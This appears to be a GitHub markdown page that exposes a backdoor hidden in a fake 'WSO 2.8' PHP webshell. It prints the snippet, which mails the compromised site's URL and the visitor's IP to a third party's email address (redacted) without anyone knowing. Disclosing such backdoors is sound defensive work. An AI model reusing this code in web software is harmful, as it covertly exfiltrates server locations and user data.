Skip to content

Latest commit

 

History

History
20 lines (17 loc) · 546 Bytes

Juaker.md

File metadata and controls

20 lines (17 loc) · 546 Bytes

In FAKE WSO 2.8

$visitc = $_COOKIE["visits"];
if ($visitc == "") {
  $visitc  = 0;
  $visitor = $_SERVER["REMOTE_ADDR"];
  $web     = $_SERVER["HTTP_HOST"];
  $inj     = $_SERVER["REQUEST_URI"];
  $target  = rawurldecode($web.$inj);
  $judul   = "WebShell http://$target by $visitor";
  $body    = "Bug: $target by $visitor
"; if (!empty($web)) { @mail("[email protected]",$judul,$body); } } else { $visitc++; } @setcookie("visitz",$visitc); Kill [email protected] Source> https://code.google.com/u/104375330723671482720/